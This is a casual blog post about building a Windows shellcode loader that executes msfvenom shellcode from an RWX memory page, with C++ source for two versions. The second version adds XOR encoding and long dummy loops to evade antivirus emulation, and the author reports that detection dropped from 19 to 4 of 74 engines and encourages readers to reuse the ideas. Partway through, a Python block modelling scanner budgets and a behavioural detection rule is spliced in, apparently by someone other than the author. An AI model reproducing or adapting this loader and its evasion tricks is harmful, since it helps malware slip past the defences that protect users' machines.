
popping a calc on windows

popping a calc :o

beginnings

i wanted to open a calculator

getting started

so first i created a c++ project and wrote some code to pop a calc

#include <windows.h>   // VirtualAlloc, RtlMoveMemory, MEM_* and PAGE_* constants

// shellcode and shellcode_size are the msfvenom output and are not shown in the post.

int main() {
    // allocate a page that is readable, writable and executable at once (RWX)
    void *exec = VirtualAlloc(
        nullptr,
        shellcode_size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );

    if (exec == NULL) {
        return 1;
    }

    // copy the shellcode into the RWX page
    RtlMoveMemory(exec, shellcode, shellcode_size);

    // jump into the page
    ((void(*)())exec)();
    return 0;
}

oops!

oh no my code no work :(

what happened

  1. i forgot to specify x64 when making shellcode with msfvenom
  2. i forgot to add execute to page permissions

this took me about 30-40 minutes in total to fix :)

anyways, defender (obviously) caught it, so what next?

silly stuff

antivirus engines aim to protect without disrupting the user experience, so they cannot spend too much time on any one file. if a program contains a lot of loops, scanning it would eat up too many resources, or something along those lines (i read it in some strange document from ages ago)

anyways, all i did was add a little loop before my program started (and xor the shellcode)

#include <windows.h>   // VirtualAlloc, RtlMoveMemory, MEM_* and PAGE_* constants
#include <climits>     // INT_MAX
#include <random>      // std::random_device, std::mt19937, std::uniform_int_distribution

// shellcode, shellcode_size, key, key_size and xor_decrypt() are not shown in the post
// (the shellcode comes from msfvenom and the xor routine from chat gpt, see credits).

int main() {
    int a = 0, b = 0;
    std::random_device rand;
    std::mt19937 gen(rand());
    std::uniform_int_distribution<int> rng(0, INT_MAX);

    // busy-work loop #1: count up to INT_MAX - 1
    for (int i = 0; i < INT_MAX - 1; i++) {
        a++;
    }

    if (a != INT_MAX - 1) {
        return 1;
    }

    int res = 0;

    // busy-work loop #2: more meaningless arithmetic on random values
    for (int i = 0; i < INT_MAX - 1; i++) {
        b = rng(gen);
        res = a ^ b;
        a &= 0xFFFFFFFF;   // leaves a unchanged; the original `a & 0xFFFFFFFF;` was a statement with no effect
    }

    res = b;
    a = res;

    // decode the xor-encrypted shellcode in place
    xor_decrypt(shellcode, key, shellcode_size, key_size);

    // allocate an RWX page, copy the decoded shellcode in, and jump into it
    void *exec = VirtualAlloc(
        nullptr,
        shellcode_size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );
    if (exec == NULL) {
        return 1;
    }

    RtlMoveMemory(exec, shellcode, shellcode_size);

    ((void(*)())exec)();
    return 0;
}

the loop is completely meaningless, but the antivirus has to step through it anyway since it performs real operations, which in theory makes the scanner give up on the file before it gets to the interesting part
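To make the theory concrete from the scanning side, here is a small constructed model (added here, not code from the post): a scan pass with an instruction budget, and a behavioural rule keyed on the loader's own VirtualAlloc(RWX) -> RtlMoveMemory -> execute chain. The event names, region labels, costs and the "ExecFromRegion" event are all assumptions for the model.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

# Real Win32 page-protection constants (the post's loader uses the RWX one).
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40

@dataclass
class Event:
    api: str          # recorded call; "ExecFromRegion" is a constructed event for
                      # the indirect call into the allocation
    region: str       # constructed label for the allocation the event touches
    cost: int = 1     # emulated instructions spent getting to this event
    protect: int = 0  # page protection, meaningful for VirtualAlloc only

def rwx_shellcode_sequence(trace: List[Event]) -> Optional[str]:
    """Return the region that went alloc-RWX -> written -> executed, else None."""
    state: Dict[str, str] = {}
    for ev in trace:
        if ev.api == "VirtualAlloc" and ev.protect == PAGE_EXECUTE_READWRITE:
            state[ev.region] = "rwx"
        elif ev.api == "RtlMoveMemory" and state.get(ev.region) == "rwx":
            state[ev.region] = "written"
        elif ev.api == "ExecFromRegion" and state.get(ev.region) == "written":
            return ev.region
    return None

def budgeted_scan(trace: List[Event], budget: int) -> str:
    """A scan pass that stops once its instruction budget is spent."""
    spent, seen = 0, []
    for ev in trace:
        spent += ev.cost
        if spent > budget:
            return "gave_up"  # budget burnt before the interesting calls
        seen.append(ev)
    return "malicious" if rwx_shellcode_sequence(seen) else "clean"

# Constructed traces mirroring the post's two loaders and a benign program.
PLAIN_LOADER = [
    Event("VirtualAlloc", "exec", cost=50, protect=PAGE_EXECUTE_READWRITE),
    Event("RtlMoveMemory", "exec"),
    Event("ExecFromRegion", "exec"),
]
BUSY_LOOP_LOADER = [  # two INT_MAX-iteration loops run before the first call
    Event("VirtualAlloc", "exec", cost=2 * (2**31 - 1), protect=PAGE_EXECUTE_READWRITE),
    Event("RtlMoveMemory", "exec"),
    Event("ExecFromRegion", "exec"),
]
BENIGN = [Event("VirtualAlloc", "buf", protect=PAGE_READWRITE), Event("RtlMoveMemory", "buf")]
```

The busy loop only defeats the budgeted pass; the behavioural rule still fires on the busy-loop trace because the loop never changes what the loader does at runtime.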

conclusion

my theory must have been pretty close, because detections dropped from 19/74 to 4/74

while this is nothing special, it was a fun little project to do pre-workout. :D now that it's on virustotal tho, rip this code; please do not be surprised when you try this 6 months later and it gets flagged to oblivion :(

instead, take the ideas here and apply them to your own!!

credits

  • thank you gatari for telling me that i Do Not need to mess with virtualprotect
  • msfvenom for the shellcode
  • chat gpt for the xor code
This post is licensed under CC BY 4.0 by the author.
